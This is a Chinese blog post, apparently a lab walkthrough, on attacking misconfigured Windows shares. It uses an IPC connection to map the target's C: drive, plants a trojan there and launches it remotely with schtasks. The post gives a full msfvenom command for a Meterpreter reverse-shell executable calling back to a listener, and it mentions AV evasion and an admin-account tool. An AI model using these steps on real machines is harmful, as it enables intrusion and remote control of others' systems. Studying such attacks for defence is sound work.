windows共享磁盘安全问题

其实很久不水不知道该怎么写了，如果组策略以及权限安排合理，共享文件并不会造成太大威胁的。。
那就假装他不合理吧，，，，
搭建环境：两个windows10
其次组策略中配置如下

![在这

因为可能会产生共享出现无法访问，提示为你没有权限访问网络资源这一类。。

但大家都知道的是这样的配置就意味这可以进行ipc连接，故而我们可以将对方的c盘映射过来。
这里遇到了一个问题，就是我们验证了共享以后建立ipc连接会给如下错误：

我们利用net use * /del /y清除一下建立的连接
但部分情况可能还是老样子，比如我，，，，直接注销登陆就好了。

这里成功创建
建立连接了就很方便了，我们生成木马，我比较习惯msf了。。。。。用msfvenom制作一个exe马（前提是要免杀处理，这个以后会说，虽然我后渗透菜的一比）msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.109 LPORT=6666 -f exe -o m.exe
然后就是msf控制台的一波操作，这里不是重点，不废话。我们把做好的马子拖到映射的磁盘中（其实也就是放在了目标的c盘里），接下来是创建定时任务使得远程启动，这里关于定时任务有几点坑，首先at命令固然方便，但at很多毛病不谈，而且高版本中at命令已然弃用，其次比较稳定且方便的命令是psexec，但是这个工具固然强大，然而前提是双方都有安装，所以看运气而行。就像：
还有一个比较熟悉的就是schtasks了，
具体怎么运行参照手册，大概就是这个样子，直接运行exe文件出现了安全程序包的错误提示，我目录下新建了一个内容为m.exe的批处理文件，制定远程机器任务计划后，等到时间既运行木马，

注重在木马免杀，否则一律完犊子，正好白嫖了一位老哥的免杀添加管理账号的工具，这里就不放了也不演示了，不知道怎么水，可能表达不是很明白，所以不足的地方还请大家多指正。